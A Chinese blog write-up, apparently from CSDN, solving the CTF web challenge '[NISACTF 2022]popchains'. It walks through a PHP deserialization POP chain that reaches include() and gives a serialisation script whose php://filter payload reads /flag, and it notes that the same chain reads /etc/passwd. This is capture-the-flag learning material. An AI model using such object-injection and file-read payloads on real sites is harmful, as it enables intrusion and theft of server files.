[NISACTF 2022]popchains

最新推荐文章于 2024-06-12 09:51:06 发布
最新推荐文章于 2024-06-12 09:51:06 发布
阅读量974 收藏 8
点赞数 14
分类专栏: ctf 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73612768/article/details/135378726
版权

[NISACTF 2022]popchains wp

题目代码:

Happy New Year~ MAKE A WISH
<?php

echo 'Happy New Year~ MAKE A WISH<br>';

if(isset($_GET['wish'])){
    @unserialize($_GET['wish']);
}
else{
    $a=new Road_is_Long;
    highlight_file(__FILE__);
}
/***************************pop your 2022*****************************/

class Road_is_Long{
    public $page;
    public $string;
    public function __construct($file='index.php'){
        $this->page = $file;
    }
    public function __toString(){
        return $this->string->page;
    }

    public function __wakeup(){
        if(preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page)) {
            echo "You can Not Enter 2022";
            $this->page = "index.php";
        }
    }
}

class Try_Work_Hard{
    protected  $var;
    public function append($value){
        include($value);
    }
    public function __invoke(){
        $this->append($this->var);
    }
}

class Make_a_Change{
    public $effort;
    public function __construct(){
        $this->effort = array();
    }

    public function __get($key){
        $function = $this->effort;
        return $function();
    }
}
/**********************Try to See flag.php*****************************/

是一道 PHP 反序列化题。

先来回顾一下 PHP 全部魔术方法及其触发条件

__construct()– 在创建对象时调用,用于初始化对象的属性和方法。
__destruct() – 在对象销毁时调用,用于释放资源和清理操作。
__call(args) – 在调用一个不存在的方法时触发。
__callStatic(args) – 在调用一个不存在的静态方法时触发。
__get($name) – 在访问一个不存在的属性时触发。
__set(value) – 在给一个不存在的属性赋值时触发。给私有属性,受保护属性赋值也能触发。
__isset($name) – 在判断一个不存在的属性是否存在时触发。
__unset($name) – 在销毁一个不存在的属性时触发。
__sleep() – 在序列化一个对象时触发。
__wakeup() – 在反序列化一个对象时触发。
__toString() – 在将对象转换为字符串时触发。echo,print,die,preg_match,strtolower等函数操作对象时触发,还有弱比较 == 也能触发。
__invoke($args) – 在将对象作为函数调用时触发。
__set_state($properties) – 在使用var_export()导出类时触发。
__clone() – 在将对象复制时触发。
__debugInfo() – 在使用var_dump()函数打印对象时触发。

构造 pop 链

include() 函数在 Try_Work_Hard 类的 append 方法里,并且该类的 __invoke() 方法调用了 append 方法;

Try_Work_Hard 类的 __invoke() 方法可以在 Make_a_Change 类的 __get 方法中被触发:return $function();

Make_a_Change 类的 __get 方法可以在 Road_is_Long 类的 __toString() 方法中被触发:return $this->string->page;

Road_is_Long 类的 __toString() 方法可以在 Road_is_Long 类的 __wakeup() 方法中被触发:preg_match("/file|ftp|http|https|gopher|dict|\.\./i", $this->page) ,原因是:

preg_match() 函数用于在字符串中执行正则表达式匹配。它接受一个字符串作为输入,而不是一个对象。如果你传递一个对象给 preg_match() 函数,PHP 会尝试将这个对象转换为一个字符串,就触发了该对象的 __toString() 方法

Road_is_Long 类的 __wakeup() 方法在反序列化时被触发;

这样,pop 链就构造完成了,以下是代码:

<?php
class Road_is_Long{
    public $page;
    public $string;

}
class Try_Work_Hard{
    protected  $var = "php://filter/read=convert.base64-encode/resource=/flag";

}
class Make_a_Change{
    public $effort;

}
/**********************Try to See flag.php*****************************/
$demo = new Road_is_Long();
$demo->page = new Road_is_Long();
$demo->page->string = new Make_a_Change();
$demo->page->string->effort = new Try_Work_Hard();
echo urlencode(serialize($demo));

根据提示,我去读取 flag.php 文件,但是怎样都读取不出来,明明同样的代码,换成 /etc/passwd 都能读出来。后来看了大佬的 wp ,得知 flag 在根目录下,合着 flag.php 只是个幌子呗。

拿到 flag :

在这里插入图片描述

妙尽璇机
关注
  • 14
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[NISACTF 2022]popchains - 反序列化+伪协议
oZuoShen123的博客
10-07 1433
链条:Road_is_Long(construct->wakeup【page=$r】-> toString【string=$m】)-> Make_a_Change(construct->get【effort=$t】)-> Try_Work_Hard(invoke->append【var='php://filter/read=convert.base64-encode/resource=/flag'】)
nssctf (1)
qq_61988806的博客
05-04 584
先找出口 很明显时 通过include 所以是append方法寻找调用append方法的地方发现__invoke魔术方法那调用__invoke方法当脚本尝试将对象调用为函数时触发寻找触发invoke的地方 发现 __get中function以函数执行get魔术方法读取不可访问的属性的值时会被调用寻找读取不可访问的属性的地方_toString 中$this->string->page 这里没有page这个属性的定义。
解:[NISACTF 2022]popchains--TLS_预备队任务(1)
river_mouth_man的博客
03-08 600
php反序列化,构造pop链
NSSCTF web题记录
m0_64815693的博客
11-08 9475
[GXYCTF 2019]BabyUpload [GKCTF 2020]CheckIN [NISACTF 2022]babyserialize [NISACTF 2022]popchains [NSSRound#4 SWPU]1zweb prize_p1 prize_p5 [NISACTF 2022]middlerce [SWPUCTF 2021 新生赛]babyunser [TQLCTF 2022]simple_bypass
NSS [NISACTF 2022]popchains
Jay17的博客
04-12 236
NSS [NISACTF 2022]popchains
[NISACTF 2022]
snowlyzz的博客
09-09 5932
NISACTF部分WP
NSSCTF-Web刷题记录一
plant1234的博客
03-11 1322
通过题目分析要去查看flag.php内容,进行实现,所以以Try_Work_Hard为链子低端进行分析首先要利用的是include函数,但需要用__invoke方法来调用__invoke的触发条件是:当尝试以调用函数的方式调用一个对象时,__invoke() 方法会被自动调用所以我们要找一个可以被控制且被调用的函数给它赋值Try_Work_Hard对象该类中在__get()方法可以实现这一功能,但__get()方法的触发需要:从不可访问的属性读取数据。
[NISACTF 2022]下
qq_62046696的博客
07-30 2339
打开界面看见这种,格式一般都是利用管道符然后进行堆叠注入或者报错注入试一下堆叠注入试了一下被过滤掉了,那就是报错注入喽or被过滤用||代替=被过滤用like代替database里面的as被过滤,通过查询一个不存在的表,通过报错获得表名column被过滤,用无列名注入输出长度限制,mid函数,substr函数t因为as被过滤所以不能使用,database因为aa是错误的表名,sqlsql就是正确的表名,通过报错。...
NISACTF 2022 writeup
热门推荐
st1cky的博客
03-29 3万+
周末两天的比赛 WEB(11/12)、PWN(5/6)、Reverse(3/6)、Crypto(3/7)、Misc(8/12) WEB没有AK还是略有遗憾,到后面实在做不动了。 第一次写这么长的WP… WEB checkin <?php error_reporting(0); include "flag.php"; // ‮⁦NISACTF⁩⁦Welcome to if ("jitanglailo" == $_GET[ahahahaha] &‮⁦+!!⁩⁦& "‮⁦ Flag!.
pop构造链表(细节)
qq_62046696的博客
07-13 376
现在学的是如何构造链表,找链子,要找链子魔术方法一定要特别清楚 首先,先找起点和终点,终点一般都是一些执行函数比如eval,看见了include(flag.php)终点确定,起点就是 _destruct看了一圈发现了w33m类中的__toString()中有个函数调用而且类名和函数名都是变量,那么这个__toString() 就和Getflag()连接起来了,再向前推,触发__toString()的条件是当一个对象被当作字符串处理,一看便看到了w22m中__destruct()w22m-->>dest
NSSCTF web刷题
akxnxbshai的博客
08-15 2903
闲来无聊写一写NSSCTF
[NISACTF 2022]WriteUp web
Pysnow's Blog
04-01 4343
[NISACTF 2022] WEB checkin 打开一看,本来一位就是简单的一道get传参题,结果发现复制的时候出现了问题 所以我就把代码复制到vscode上面来 发现存在Unicode特殊字符,直接把字符原样复制下来,然后URLencode编码一下 最终payload ?ahahahaha=jitanglailo&%E2%80%AE%E2%81%A6Ugeiwo%E2%81%A9%E2%81%A6cuishiyuan=%E2%80%AE%E2%81%A6 Flag!%E2%81%
NISACTF2022公开通道
as you know, nlp is fantasitc!
03-29 1993
NISACTF2022公开通道checkinlevel_up第一层 robots.txt第二层 md5碰撞第三层 sha1碰撞第四层 parse_url解析漏洞第五层create_function()注入bingdundunbabyserializebabyuploadeasyssrfis secret(原题)popchain(原题)middlevel(原题) 题目 checkin urlencode,因为解释器读取出来的才是真正的顺序 ahahahaha=jitanglailo&&%E2%
NISACTF2022公开通道(复现)
as you know, nlp is fantasitc!
03-31 4648
目录middlerce(复现)join-us(复现)hardsql(复现) middlerce(复现) <?php include "check.php"; if (isset($_REQUEST['letter'])){ $txw4ever = $_REQUEST['letter']; if (preg_match('/^.*([\w]|\^|\*|\(|\~|\`|\?|\/| |\||\&|!|\<|\>|\{|\x09|\x0a|\[).*$/m',$txw
尔滨等保测评实践:洞见成功之道与汲取宝贵教训
2301_79527080的博客
06-07 303
为应对这些挑战,根据《中华人民共和国网络安全法》及《信息安全等级保护管理办法》等相关法律法规,哈尔滨市政府及企业主动开展等保测评工作,旨在提升信息系统安全防护能力,确保数据安全与业务连续性。重点强化了数据加密传输、访问控制以及个人信息保护措施。信息安全等级保护测评(简称“等保测评”),作为确保信息系统安全的关键环节,近年来在哈尔滨得到了广泛的应用与实践。教训一:管理制度滞后于技术部署• 在一些早期实施的等保项目中,企业过分注重技术设施的投入,却忽视了与之配套的安全管理制度建设,导致安全策略执行不力。
网络安全管理组织架构复习
最新发布
LongL_GuYu的博客
06-12 299
网络安全管理组织架构复习
网络安全的神秘世界】web应用程序安全与风险
weixin_54750312的博客
06-05 1337
web攻击的本质,就是通过http协议篡改应用程序(永远不要相信用户的输入)可利用点:请求方法、请求头、请求体利用过程:认证、会话、授权弱口令强口令账号枚举认证不满足强口令条件密码长度至少8位包含大小写字母、数字、特殊字符中的至少3类密码和用户名无相关性尝试大量可能的账号名称,以找出系统中存在的有效账号为了密码爆破做准备,节省攻击时间判断下面属于什么口令:admin@123#1 --弱口令,与用户名相关。
网络安全】【深度学习】【入侵检测】SDN模拟网络入侵攻击并检测,实时检测,深度学习【一】
q742971636的博客
06-09 1289
Mininet: 主要用于创建和模拟虚拟网络拓扑,适合于网络实验和研究。Ryu: 主要用于开发和运行 SDN 控制器,用于管理和控制网络设备。这两个工具通常可以结合使用:使用 Mininet 模拟网络环境,使用 Ryu 作为 SDN 控制器来管理模拟网络中的设备和流量。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值